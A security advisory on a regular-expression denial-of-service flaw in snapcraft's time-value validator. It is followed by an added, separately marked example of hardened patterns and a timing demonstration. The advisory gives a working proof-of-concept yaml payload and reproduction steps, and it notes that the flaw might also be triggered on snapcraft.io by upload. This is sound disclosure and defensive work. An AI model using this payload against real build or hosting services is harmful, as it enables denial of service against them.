Coordinated Disclosure Timeline

Summary

A snap with a crafted yaml file can cause a denial of service in snapcraft.

Project

snapcraft

Tested Version

8.4.4

Details

ReDoS in _validate_time (GHSL-2024-323)

_validate_time uses a regex to check that time values in a snap’s yaml file are formatted correctly:

import re

import pydantic

@pydantic.field_validator(
    "start_timeout", "stop_timeout", "watchdog_timeout", "restart_delay"
)
@classmethod
def _validate_time(cls, timeval):
    # Vulnerable pattern: "ms" can be consumed either as the "ms" alternative or as
    # "m" followed by "s", and the group is repeated, so a failing match backtracks
    # over every possible split of the input.
    if not re.match(r"^[0-9]+(ns|us|ms|s|m)*$", timeval):
        raise ValueError(f"{timeval!r} is not a valid time value")

    return timeval

For example, 10s or 10ms are both valid times. But the regex has a ReDoS vulnerability: the unit group is ambiguous (a run of "ms" can be matched either as the ms alternative or as m followed by s) and it is repeated with *, so when the overall match fails the engine backtracks through every way of splitting the input. That means it runs very slowly on invalid inputs like this:

0msmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsx

To reproduce the ReDoS with snapcraft, first create an empty snap by running this command:

snapcraft init

Then replace the contents of ./snap/snapcraft.yaml with this text:

name: GHSL-2024-323
base: core24

apps:
  GHSL-2024-323:
    command: /bin/echo kevwozere
    restart-delay: 0msmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsx

Now run the following command and observe that it takes a long time to finish:

snapcraft

The running time increases exponentially with the length of the invalid string.
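The following is an added example, not code from the advisory or from snapcraft. It places the vulnerable pattern quoted above beside two mitigations that are assumptions of this example rather than upstream's actual fix: a pattern with the repetition removed (at most one unit suffix, so there is no ambiguous repetition to backtrack over) and a regex-free linear-time parser. The `redos_input` helper constructs strings in the shape of the PoC value (`0` + n copies of `ms` + `x`), and `backtracking_paths` gives the number of ways the vulnerable pattern can split such a string, which is why the running time grows exponentially in n.

```python
import re
import time
from typing import Optional, Tuple

# The pattern quoted from snapcraft's _validate_time, kept exactly as in the advisory.
VULNERABLE_TIME_RE = re.compile(r"^[0-9]+(ns|us|ms|s|m)*$")

# Assumed hardened pattern (this example's choice, not necessarily the upstream fix):
# at most one unit suffix. Without the `*`, a run of "ms" blocks cannot be split in
# 2^n different ways, so a failing match is rejected after a handful of steps.
HARDENED_TIME_RE = re.compile(r"^[0-9]+(ns|us|ms|s|m)?$")

UNITS = ("ns", "us", "ms", "s", "m")


def is_valid_time_vulnerable(timeval: str) -> bool:
    """Same check as the advisory's validator; slow on adversarial input."""
    return VULNERABLE_TIME_RE.match(timeval) is not None


def is_valid_time_hardened(timeval: str) -> bool:
    """Accepts the same sane values ("10", "10s", "10ms") with no backtracking blow-up."""
    return HARDENED_TIME_RE.match(timeval) is not None


def parse_time(timeval: str) -> Optional[Tuple[int, str]]:
    """Regex-free alternative: returns (value, unit) or None, in O(len(timeval))."""
    i = 0
    while i < len(timeval) and timeval[i].isdigit():
        i += 1
    if i == 0:
        return None  # no leading digits
    unit = timeval[i:]
    if unit != "" and unit not in UNITS:
        return None  # anything after the digits must be exactly one known unit
    return int(timeval[:i]), unit


def redos_input(n: int) -> str:
    """Constructed input in the shape of the advisory's PoC: a digit, n 'ms' blocks, then 'x'.

    The trailing 'x' guarantees the match fails, which is what forces the backtracking.
    """
    return "0" + "ms" * n + "x"


def backtracking_paths(n: int) -> int:
    """Each 'ms' block can be consumed as the 'ms' alternative or as 'm' then 's':
    two choices per block, so 2**n distinct splits before the engine gives up."""
    return 2 ** n


def time_match(pattern: re.Pattern, s: str) -> float:
    """Wall-clock seconds for a single match attempt."""
    t0 = time.perf_counter()
    pattern.match(s)
    return time.perf_counter() - t0


if __name__ == "__main__":
    # Doubling n should roughly square the vulnerable pattern's time while the
    # hardened pattern stays flat. (The PoC uses n=28: about 2.7e8 paths.)
    for n in (10, 12, 14, 16):
        s = redos_input(n)
        print(f"n={n:2d} paths={backtracking_paths(n):>6d} "
              f"vulnerable={time_match(VULNERABLE_TIME_RE, s):.4f}s "
              f"hardened={time_match(HARDENED_TIME_RE, s):.6f}s")
    print(parse_time("10ms"), parse_time("10s"), parse_time(redos_input(28)))
```

Note that the hardened pattern is slightly stricter than the original: the original's `*` also accepted oddities such as `10sms`, which carry no meaning as a duration, so the tightening is a semantic clean-up as well as a performance fix. The `parse_time` variant shows the other standard mitigation: when the grammar is this simple, a few lines of explicit scanning remove the backtracking engine from the untrusted-input path entirely.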

This vulnerability was discovered with the help of CodeQL’s Inefficient regular expression query.

Impact

This issue may lead to denial of service. We have only tested our PoC locally, but it may also be possible to trigger a denial of service on https://snapcraft.io/ by uploading a malicious snap.

Credit

This issue was discovered and reported by GHSL team member @kevinbackhouse (Kevin Backhouse).

Contact

You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2024-323 in any communication regarding this issue.